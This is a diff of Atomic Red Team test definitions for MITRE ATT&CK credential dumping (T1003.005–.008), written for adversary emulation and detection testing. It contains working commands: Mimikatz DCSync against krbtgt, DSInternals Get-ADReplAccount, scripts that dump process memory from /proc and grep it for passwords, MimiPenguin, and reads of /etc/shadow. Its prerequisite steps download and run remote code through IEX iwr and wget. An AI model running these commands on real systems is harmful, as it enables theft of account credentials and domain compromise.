On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix)
With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Cached Credential Dump via Cmdkey](#atomic-test-1-cached-credential-dump-via-cmdkey)
- [Atomic Test #1 - Cached Credential Dump via Cmdkey](#atomic-test-1---cached-credential-dump-via-cmdkey)
### Atomic Test #1: Cached Credential Dump via Cmdkey
<br/>
## Atomic Test #1 - Cached Credential Dump via Cmdkey
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
Credentials listed with Cmdkey only pertain to the current user
Passwords will not be displayed once they are stored
@@ -28,11 +30,24 @@ https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-
**Supported Platforms:** Windows
**auto_generated_guid:** `56506854-89d6-46a3-9804-b7fde90791f9`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 56506854-89d6-46a3-9804-b7fde90791f9
#### Attack Commands: Run with `command_prompt`!
```cmd
cmdkey /list
```
<br/>
atomics/T1003.006/T1003.006.md
+51 -32
View File
@@ -1,22 +1,25 @@
# T1003.006 - OS Credential Dumping: DCSync
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
> Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
>
> Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
>
> DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
[Source](https://attack.mitre.org/techniques/T1003/006)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
</blockquote>
## Atomic Tests
- [Atomic Test #1: DCSync (Active Directory)](#atomic-test-1-dcsync-active-directory)
- [Atomic Test #2: Run DSInternals Get-ADReplAccount](#atomic-test-2-run-dsinternals-get-adreplaccount)
- [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)
### Atomic Test #1: DCSync (Active Directory)
- [Atomic Test #2 - Run DSInternals Get-ADReplAccount](#atomic-test-2---run-dsinternals-get-adreplaccount)
<br/>
## Atomic Test #1 - DCSync (Active Directory)
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
@@ -24,36 +27,39 @@ Privileges required: domain admin or domain controller account (by default), or
**Supported Platforms:** Windows
**auto_generated_guid:** `129efd28-8497-4c87-a1b0-73b9a870ca3e`
#### Inputs
**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Targeted Active Directory domain | string | %userdnsdomain%|
| user | Targeted user | string | krbtgt|
| mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
@@ -64,8 +70,13 @@ $basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
### Atomic Test #2: Run DSInternals Get-ADReplAccount
<br/>
<br/>
## Atomic Test #2 - Run DSInternals Get-ADReplAccount
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
@@ -73,35 +84,43 @@ https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
**Supported Platforms:** Windows
**auto_generated_guid:** `a0bced08-3fc5-4d8b-93b7-e8344739376e`
#### Inputs
**auto_generated_guid:** a0bced08-3fc5-4d8b-93b7-e8344739376e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("&#92;")|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADReplAccount -All -Server #{logonserver}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: DSInternals must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Install-Module -Name DSInternals -Scope CurrentUser -Force
```
<br/>
atomics/T1003.006/T1003.006.yaml
+2 -1
View File
@@ -64,7 +64,8 @@ atomic_tests:
DSInternals must be installed
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name DSInternals -Scope CurrentUser -Force
executor:
atomics/T1003.007/T1003.007.md
+103 -91
View File
@@ -1,40 +1,51 @@
# T1003.007 - OS Credential Dumping: Proc Filesystem
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
<blockquote>
## Description from ATT&CK
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the processs virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the processs virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
> Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the processs virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the processs virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
>
> When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the processs memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
>
> If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the processs memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
[Source](https://attack.mitre.org/techniques/T1003/007)
If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
</blockquote>
## Atomic Tests
- [Atomic Test #1: Dump individual process memory with sh (Local)](#atomic-test-1-dump-individual-process-memory-with-sh-local)
- [Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local)](#atomic-test-2-dump-individual-process-memory-with-sh-on-freebsd-local)
- [Atomic Test #3: Dump individual process memory with Python (Local)](#atomic-test-3-dump-individual-process-memory-with-python-local)
- [Atomic Test #4: Capture Passwords with MimiPenguin](#atomic-test-4-capture-passwords-with-mimipenguin)
- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
### Atomic Test #1: Dump individual process memory with sh (Local)
- [Atomic Test #2 - Dump individual process memory with sh on FreeBSD (Local)](#atomic-test-2---dump-individual-process-memory-with-sh-on-freebsd-local)
- [Atomic Test #3 - Dump individual process memory with Python (Local)](#atomic-test-3---dump-individual-process-memory-with-python-local)
- [Atomic Test #4 - Capture Passwords with MimiPenguin](#atomic-test-4---capture-passwords-with-mimipenguin)
<br/>
## Atomic Test #1 - Dump individual process memory with sh (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** `7e91138a-8e74-456d-a007-973d67a0bb80`
#### Inputs
**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | path | /tmp/T1003.007.sh|
| pid_term | Unique string to use to identify target process | string | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
@@ -47,49 +58,56 @@ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
### Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local)
<br/>
<br/>
## Atomic Test #2 - Dump individual process memory with sh on FreeBSD (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
**Supported Platforms:** Linux
**auto_generated_guid:** `fa37b633-e097-4415-b2b8-c5bf4c86e423`
#### Inputs
**auto_generated_guid:** fa37b633-e097-4415-b2b8-c5bf4c86e423
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | path | /tmp/T1003.007.sh|
| pid_term | Unique string to use to identify target process | string | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
@@ -101,42 +119,47 @@ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM
strings "#{output_file}" | grep -i PASS
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
### Atomic Test #3: Dump individual process memory with Python (Local)
<br/>
<br/>
## Atomic Test #3 - Dump individual process memory with Python (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
**Supported Platforms:** Linux
**auto_generated_guid:** `437b2003-a20d-4ed8-834c-4964f24eec63`
#### Inputs
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
@@ -144,7 +167,9 @@ On FreeBSD procfs must be mounted.
| python_script | Path to script generating the target process | path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
| pid_term | Unique string to use to identify target process | string | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
@@ -154,46 +179,42 @@ $PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
##### Description: Requires Python
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
(which python || which python3 || which python2)
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
echo "Python 2.7+ or 3.4+ must be installed"
```
### Atomic Test #4: Capture Passwords with MimiPenguin
<br/>
<br/>
## Atomic Test #4 - Capture Passwords with MimiPenguin
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
@@ -201,85 +222,76 @@ See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:
**Supported Platforms:** Linux
**auto_generated_guid:** `a27418de-bdce-4ebd-b655-38f04842bf0c`
#### Inputs
**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007Test3.txt|
| MimiPenguin_Location | Path of MimiPenguin script | path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```bash
rm -f #{output_file} > /dev/null
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
```
##### Description: Strings must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
sudo apt-get -y install binutils
```
##### Description: Python2 must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
sudo apt-get -y install python2
```
##### Description: Libc-bin must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
sudo apt-get -y install libc-bin
```
<br/>
atomics/T1003.007/src/dump_heap.py
+12 -15
View File
@@ -1,16 +1,21 @@
#!/usr/bin/env python
'''Dump a process's heap space to disk
Usage:
python dump_proc.py <PID> <filepath>
'''
import argparse
import platform
parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
parser.add_argument('pid', type=int, help='ID of process to dump')
parser.add_argument('filepath', help='A filepath to save output to')
args = parser.parse_args()
process_id = args.pid
output_file = args.filepath
if platform.system() == "Linux":
with open("/proc/{}/maps".format(process_id), "r") as maps_file:
# example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap]
@@ -20,24 +25,16 @@ if platform.system() == "Linux":
mem_stop = int(heap_range.split('-')[1], 16)
mem_size = mem_stop - mem_start
elif platform.system() == "FreeBSD":
import subprocess
procstat_output = subprocess.check_output(["procstat", "-v", str(process_id)], universal_newlines=True)
heap_line = None
for line in procstat_output.splitlines():
if "rw-" in line and "sw" in line:
heap_line = line
break
if not heap_line:
for line in procstat_output.splitlines():
if "rw-" in line and not (".so" in line or "/lib/" in line):
heap_line = line
break
columns = heap_line.split()
mem_start = int(columns[1], 16)
mem_stop = int(columns[2], 16)
import linecache
mem_line = linecache.getline("/proc/"+str(process_id)+"/map",4)
mem_start = int(mem_line.split(' ')[0], 16)
mem_stop = int(mem_line.split(' ')[1], 16)
mem_size = mem_stop - mem_start
mem_start = mem_stop
with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
mem_file.seek(mem_start, 0)
heap_mem = mem_file.read(mem_size)
with open(output_file, "wb") as ofile:
ofile.write(heap_mem)
atomics/T1003.008/T1003.008.md
+107 -42
View File
@@ -1,142 +1,202 @@
# T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
> Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
>
> Linux stores user information such as user ID, group ID, home directory path, and login shell in <code>/etc/passwd</code>. A "user" on the system may belong to a person or a service. All password hashes are stored in <code>/etc/shadow</code> - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)
>
> Adversaries may attempt to read or dump the <code>/etc/passwd</code> and <code>/etc/shadow</code> files on Linux systems via command line utilities such as the <code>cat</code> command.(Citation: Arctic Wolf) Additionally, the Linux utility <code>unshadow</code> can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command <code>/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>(Citation: nixCraft - John the Ripper). Since the user information stored in <code>/etc/passwd</code> are linked to the password hashes in <code>/etc/shadow</code>, an adversary would need to have access to both.
Linux stores user information such as user ID, group ID, home directory path, and login shell in <code>/etc/passwd</code>. A "user" on the system may belong to a person or a service. All password hashes are stored in <code>/etc/shadow</code> - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)
[Source](https://attack.mitre.org/techniques/T1003/008)
Adversaries may attempt to read or dump the <code>/etc/passwd</code> and <code>/etc/shadow</code> files on Linux systems via command line utilities such as the <code>cat</code> command.(Citation: Arctic Wolf) Additionally, the Linux utility <code>unshadow</code> can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command <code>/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>(Citation: nixCraft - John the Ripper). Since the user information stored in <code>/etc/passwd</code> are linked to the password hashes in <code>/etc/shadow</code>, an adversary would need to have access to both.
</blockquote>
## Atomic Tests
- [Atomic Test #1: Access /etc/shadow (Local)](#atomic-test-1-access-etcshadow-local)
- [Atomic Test #2: Access /etc/master.passwd (Local)](#atomic-test-2-access-etcmasterpasswd-local)
- [Atomic Test #3: Access /etc/passwd (Local)](#atomic-test-3-access-etcpasswd-local)
- [Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat](#atomic-test-4-access-etcshadowpasswdmasterpasswd-with-a-standard-bin-thats-not-cat)
- [Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins](#atomic-test-5-access-etcshadowpasswdmasterpasswd-with-shell-builtins)
- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local)
### Atomic Test #1: Access /etc/shadow (Local)
- [Atomic Test #2 - Access /etc/master.passwd (Local)](#atomic-test-2---access-etcmasterpasswd-local)
- [Atomic Test #3 - Access /etc/passwd (Local)](#atomic-test-3---access-etcpasswd-local)
- [Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat](#atomic-test-4---access-etcshadowpasswdmasterpasswd-with-a-standard-bin-thats-not-cat)
- [Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins](#atomic-test-5---access-etcshadowpasswdmasterpasswd-with-shell-builtins)
<br/>
## Atomic Test #1 - Access /etc/shadow (Local)
/etc/shadow file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** `3723ab77-c546-403c-8fb4-bb577033b235`
#### Inputs
**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
### Atomic Test #2: Access /etc/master.passwd (Local)
<br/>
<br/>
## Atomic Test #2 - Access /etc/master.passwd (Local)
/etc/master.passwd file is accessed in FreeBSD environments
**Supported Platforms:** Linux
**auto_generated_guid:** `5076874f-a8e6-4077-8ace-9e5ab54114a5`
#### Inputs
**auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo cat /etc/master.passwd > #{output_file}
cat #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
### Atomic Test #3: Access /etc/passwd (Local)
<br/>
<br/>
## Atomic Test #3 - Access /etc/passwd (Local)
/etc/passwd file is accessed in FreeBSD and Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** `60e860b6-8ae6-49db-ad07-5e73edd88f5d`
#### Inputs
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cat /etc/passwd > #{output_file}
cat #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
### Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
<br/>
<br/>
## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
**Supported Platforms:** Linux
**auto_generated_guid:** `df1a55ae-019d-4120-bc35-94f4bc5c4b0a`
#### Inputs
**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
unamestr=$(uname)
if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; fi
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
### Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins
<br/>
<br/>
## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
**Supported Platforms:** Linux
**auto_generated_guid:** `f5aa6543-6cb2-4fae-b9c2-b96e14721713`
#### Inputs
**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }
@@ -145,8 +205,13 @@ testcat /etc/passwd
testcat /etc/shadow
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
<br/>
atomics/T1003/T1003.md
+149 -67
View File
@@ -1,25 +1,34 @@
# T1003 - OS Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
> Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
>
> Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
